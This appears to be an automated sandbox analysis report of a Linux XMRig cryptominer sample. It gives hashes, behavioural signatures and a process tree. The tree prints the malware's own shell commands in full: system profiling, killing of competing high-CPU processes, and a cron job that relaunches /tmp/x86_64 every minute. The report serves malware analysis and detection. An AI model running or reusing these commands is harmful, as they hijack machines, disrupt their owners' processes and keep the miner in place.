Analysis
-
max time kernel
318s -
max time network
313s -
platform
ubuntu-22.04_amd64 -
resource
ubuntu2204-amd64-20240729-en -
resource tags
arch:amd64arch:i386image:ubuntu2204-amd64-20240729-enkernel:5.15.0-105-genericlocale:en-usos:ubuntu-22.04-amd64system -
submitted
26-12-2024 16:17
Behavioral task
behavioral1
Sample
x86_64
Resource
ubuntu2204-amd64-20240729-en
Behavioral task
behavioral2
Sample
x86_64
Resource
debian12-armhf-20240221-en
Behavioral task
behavioral3
Sample
x86_64
Resource
debian12-mipsel-20240221-en
Behavioral task
behavioral4
Sample
x86_64
Resource
debian9-armhf-20240611-en
General
-
Target
x86_64
-
Size
2.3MB
-
MD5
de59dfac47a8261c2444f3d122a61c81
-
SHA1
488ba08f8156136d222e39dad0a64c9ca27b74d8
-
SHA256
bb62b9324bc673ff0d7841b7b0bf1f2bcbce0c4d761a5865efafdcd35411c48c
-
SHA512
cb62ae2510b464852e70983c4108b1a0b126d4e3e8bbafeacd9363a1288babcf40001a3627fa2760d16c75cbdffc5b1b06cbab8bb7c5245ca13737ab44db3426
-
SSDEEP
49152:4ZwTqMivo91J3oQ9jeOKGiss7gqH5OueN/HizQQg2Ysi:MuqFvK1Bz5isVqHIXZHiz5g2Ysi
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 1 IoCs
resource yara_rule behavioral1/memory/1563-1-0x00007f6d17d2a000-0x00007f6d183e8d40-memory.dmp xmrig -
Checks hardware identifiers (DMI) 1 TTPs 4 IoCs
Checks DMI information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /sys/devices/virtual/dmi/id/sys_vendor x86_64 File opened for reading /sys/devices/virtual/dmi/id/product_name x86_64 File opened for reading /sys/devices/virtual/dmi/id/board_vendor x86_64 File opened for reading /sys/devices/virtual/dmi/id/bios_vendor x86_64 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.jKTIzE crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads hardware information 1 TTPs 14 IoCs
Accesses system info like serial numbers, manufacturer names etc.
description ioc Process File opened for reading /sys/devices/virtual/dmi/id/chassis_type x86_64 File opened for reading /sys/devices/virtual/dmi/id/chassis_version x86_64 File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag x86_64 File opened for reading /sys/devices/virtual/dmi/id/chassis_serial x86_64 File opened for reading /sys/devices/virtual/dmi/id/bios_date x86_64 File opened for reading /sys/devices/virtual/dmi/id/product_serial x86_64 File opened for reading /sys/devices/virtual/dmi/id/board_name x86_64 File opened for reading /sys/devices/virtual/dmi/id/board_version x86_64 File opened for reading /sys/devices/virtual/dmi/id/product_uuid x86_64 File opened for reading /sys/devices/virtual/dmi/id/board_serial x86_64 File opened for reading /sys/devices/virtual/dmi/id/bios_version x86_64 File opened for reading /sys/devices/virtual/dmi/id/product_version x86_64 File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag x86_64 File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor x86_64 -
Security Software Discovery 1 TTPs 2 IoCs
Adversaries may attempt to discover installed security software and its configurations.
pid Process 1622 sh 1645 sh -
Checks CPU configuration 1 TTPs 3 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo x86_64 File opened for reading /proc/cpuinfo grep -
Reads CPU attributes 1 TTPs 7 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online x86_64 File opened for reading /sys/devices/system/cpu/types x86_64 File opened for reading /sys/devices/system/cpu/possible x86_64 File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps -
Enumerates kernel/hardware configuration 1 TTPs 62 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/bus/node/devices/node0/access0/initiators x86_64 File opened for reading /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages x86_64 File opened for reading /sys/fs/cgroup/cgroup.controllers x86_64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/type x86_64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets x86_64 File opened for reading /sys/devices/virtual/dmi/id x86_64 File opened for reading /sys/bus/node/devices/node0/access1/initiators x86_64 File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_bandwidth x86_64 File opened for reading /sys/bus/cpu/devices/cpu0/topology/die_cpus x86_64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition x86_64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets x86_64 File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_latency x86_64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/type x86_64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets x86_64 File opened for reading /sys/devices/system/node/online x86_64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size x86_64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition x86_64 File opened for reading /sys/bus/node/devices/node0/meminfo x86_64 File opened for reading /sys/bus/dax/target_node x86_64 File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_cpus x86_64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map x86_64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map x86_64 File opened for reading /sys/bus/dax/devices/target_node x86_64 File opened for reading /sys/bus/cpu/devices/cpu0/topology/package_cpus x86_64 File opened for reading /sys/bus/cpu/devices/cpu0/topology/physical_package_id x86_64 File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq x86_64 File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_id x86_64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map x86_64 File opened for reading /sys/firmware/dmi/tables/smbios_entry_point x86_64 File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/base_frequency x86_64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map x86_64 File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages x86_64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size x86_64 File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages x86_64 File opened for reading /sys/bus/dax/devices x86_64 File opened for reading /sys/bus/cpu/devices x86_64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map x86_64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/size x86_64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size x86_64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map x86_64 File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages x86_64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/size x86_64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map x86_64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map x86_64 File opened for reading /sys/fs/cgroup/cpuset.cpus.effective x86_64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map x86_64 File opened for reading /sys/bus/node/devices/node0/hugepages x86_64 File opened for reading /sys/fs/cgroup/cpuset.mems.effective x86_64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map x86_64 File opened for reading /sys/kernel/mm/hugepages x86_64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/level x86_64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/size x86_64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition x86_64 File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-1048576kB/nr_hugepages x86_64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/level x86_64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/level x86_64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/type x86_64 File opened for reading /sys/bus/node/devices/node0/cpumap x86_64 File opened for reading /sys/firmware/dmi/tables/DMI x86_64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/type x86_64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/level x86_64 File opened for reading /sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages x86_64 -
Process Discovery 1 TTPs 2 IoCs
Adversaries may try to discover information about running processes.
pid Process 1648 ps 1624 ps -
description ioc Process File opened for reading /proc/8/stat ps File opened for reading /proc/1077/stat ps File opened for reading /proc/1130/stat ps File opened for reading /proc/200/status ps File opened for reading /proc/426/stat ps File opened for reading /proc/783/status ps File opened for reading /proc/1139/stat ps File opened for reading /proc/732/status ps File opened for reading /proc/96/stat ps File opened for reading /proc/94/stat ps File opened for reading /proc/415/status ps File opened for reading /proc/1081/cmdline ps File opened for reading /proc/82/stat ps File opened for reading /proc/93/stat ps File opened for reading /proc/409/cmdline ps File opened for reading /proc/689/status ps File opened for reading /proc/25/cmdline ps File opened for reading /proc/99/stat ps File opened for reading /proc/409/stat ps File opened for reading /proc/26/status ps File opened for reading /proc/585/stat ps File opened for reading /proc/608/cmdline ps File opened for reading /proc/1380/stat ps File opened for reading /proc/16/status ps File opened for reading /proc/1560/stat ps File opened for reading /proc/1175/status ps File opened for reading /proc/24/stat ps File opened for reading /proc/411/stat ps File opened for reading /proc/415/stat ps File opened for reading /proc/588/status ps File opened for reading /proc/99/cmdline ps File opened for reading /proc/415/status ps File opened for reading /proc/77/stat ps File opened for reading /proc/1356/stat ps File opened for reading /proc/314/status ps File opened for reading /proc/520/status ps File opened for reading /proc/1083/cmdline ps File opened for reading /proc/1619/cmdline ps File opened for reading /proc/90/stat ps File opened for reading /proc/732/stat ps File opened for reading /proc/263/stat ps File opened for reading /proc/741/cmdline ps File opened for reading /proc/1237/stat ps File opened for reading /proc/74/stat ps File opened for reading /proc/1367/status ps File opened for reading /proc/608/cmdline ps File opened for reading /proc/788/cmdline ps File opened for reading /proc/1154/status ps File opened for reading /proc/1615/status ps File opened for reading /proc/82/status ps File opened for reading /proc/219/cmdline ps File opened for reading /proc/1130/cmdline ps File opened for reading /proc/377/cmdline ps File opened for reading /proc/741/status ps File opened for reading /proc/1232/cmdline ps File opened for reading /proc/102/cmdline ps File opened for reading /proc/113/cmdline ps File opened for reading /proc/1433/cmdline ps File opened for reading /proc/1604/cmdline ps File opened for reading /proc/1037/cmdline ps File opened for reading /proc/1290/cmdline ps File opened for reading /proc/774/status ps File opened for reading /proc/1157/status ps File opened for reading /proc/80/stat ps -
Writes file to tmp directory 2 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/.cron sh File opened for modification /tmp/.lock x86_64
Processes
-
/tmp/x86_64/tmp/x86_641⤵
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:1563 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""2⤵PID:1564
-
/usr/bin/hostnamehostname -I3⤵PID:1567
-
-
/usr/bin/awkawk "{print \$1}"3⤵PID:1569
-
-
/usr/bin/headhead -n 13⤵PID:1573
-
-
/usr/bin/awkawk "{print \"-\"\$2}"3⤵PID:1574
-
-
/usr/bin/grepgrep "Port "3⤵PID:1572
-
-
/usr/bin/catcat /etc/ssh/sshd_config3⤵PID:1571
-
-
/usr/bin/whoamiwhoami3⤵PID:1575
-
-
/usr/bin/hostnamehostname3⤵PID:1576
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo3⤵
- Checks CPU configuration
PID:1577
-
-
/usr/bin/sedsed -e "s/^ *//"3⤵PID:1582
-
-
/usr/bin/sedsed -e "s/\$//"3⤵PID:1583
-
-
/usr/bin/cutcut -d: -f23⤵PID:1581
-
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo3⤵
- Checks CPU configuration
PID:1580
-
-
/usr/bin/awkawk "{print \$1}"3⤵PID:1586
-
-
/usr/bin/awkawk "{print \$4}"3⤵PID:1589
-
-
/usr/bin/awkawk "{print \$4}"3⤵PID:1592
-
-
/usr/bin/awkawk "{print \$3}"3⤵PID:1595
-
-
/usr/bin/awkawk "{print \$4}"3⤵PID:1598
-
-
/usr/bin/awkawk "{print \$1}"3⤵PID:1601
-
-
/usr/bin/awkawk "{print \$2\" \"\$3\" \"\$4}"3⤵PID:1603
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵PID:1604
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"3⤵PID:1606
-
-
/usr/bin/psps -A "-ostat,ppid"3⤵
- Reads CPU attributes
- Reads runtime system information
PID:1605
-
-
/usr/bin/idid -u3⤵PID:1614
-
-
/usr/bin/grepgrep -v grep3⤵PID:1617
-
-
/usr/bin/grepgrep /etc/cron3⤵PID:1616
-
-
/usr/bin/psps x3⤵
- Reads CPU attributes
- Reads runtime system information
PID:1615
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵
- Security Software Discovery
PID:1622 -
/usr/bin/idid -u3⤵PID:1623
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"3⤵PID:1628
-
-
/usr/bin/grepgrep -v /usr/sbin/httpd3⤵PID:1627
-
-
/usr/bin/grepgrep -v -- "-bash[[:space:]]*\$"3⤵PID:1626
-
-
/usr/bin/grepgrep -v grep3⤵PID:1625
-
-
/usr/bin/psps aux3⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1624
-
-
-
/bin/shsh -c "dir=`pwd 2>/dev/null`;rm -rf \$dir/.cron 2>/dev/null;crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep -v '/tmp/x86_64' 2>/dev/null > .cron 2>/dev/null;echo '* * * * * '\$dir/'/tmp/x86_64' >> .cron 2>/dev/null; if [ \$(crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep '/tmp/x86_64\$' 2>/dev/null | sort 2>/dev/null | uniq 2>/dev/null | wc -l 2>/dev/null) -eq '0' ]; then crontab \$dir/.cron 2>/dev/null; fi;rm -rf \$dir/.cron 2>/dev/null"2⤵
- Writes file to tmp directory
PID:1630 -
/usr/bin/rmrm -rf /tmp/.cron3⤵PID:1632
-
-
/usr/bin/grepgrep -v /tmp/x86_643⤵PID:1635
-
-
/usr/bin/grepgrep -v grep3⤵PID:1634
-
-
/usr/bin/crontabcrontab -l3⤵PID:1633
-
-
/usr/bin/wcwc -l3⤵PID:1642
-
-
/usr/bin/uniquniq3⤵PID:1641
-
-
/usr/bin/sortsort3⤵PID:1640
-
-
/usr/bin/grepgrep "/tmp/x86_64\$"3⤵PID:1639
-
-
/usr/bin/grepgrep -v grep3⤵PID:1638
-
-
/usr/bin/crontabcrontab -l3⤵PID:1637
-
-
/usr/bin/crontabcrontab /tmp/.cron3⤵
- Creates/modifies Cron job
PID:1643
-
-
/usr/bin/rmrm -rf /tmp/.cron3⤵PID:1644
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"2⤵
- Security Software Discovery
PID:1645 -
/usr/bin/idid -u3⤵PID:1646
-
-
/usr/bin/wcwc -l3⤵PID:1652
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"3⤵PID:1651
-
-
/usr/bin/grepgrep -- "-bash[[:space:]]*\$"3⤵PID:1650
-
-
/usr/bin/grepgrep -v grep3⤵PID:1649
-
-
/usr/bin/psps aux3⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1648
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
27B
MD5c594ee6671add072fefa107690d0984f
SHA178f211f438618adc46dc08f08e274abdca8a7bb3
SHA256d3e9cb77ed9be820e79ea8b36c43bdc415efe6972df24008f455e964a862d12e
SHA5121ad5405c5b0080b7d18b0e9795ac049877d9d2beb71674accb56dc17d95b2d465afa98c6017cd623094751537f65f3b913797e257a095f748ddf2a813fd2850b
-
Filesize
211B
MD5f2d250cd1fd82850cb73c34ffbc5b992
SHA14a531ad845c0a5de1d53b191fd5a39b97053b25d
SHA2565a14622d3408176125e3926ba184a6741ad2adf9bcf416c0836a4b43a6028b30
SHA5129d8e0fea70c693b1beda5ccd4183ffd601407d72b607d491f9ede2cab8bee802a47f43dac5ca1d988fe3ce6582493e9c1f0116d66a3449fb31013ea146b63ca2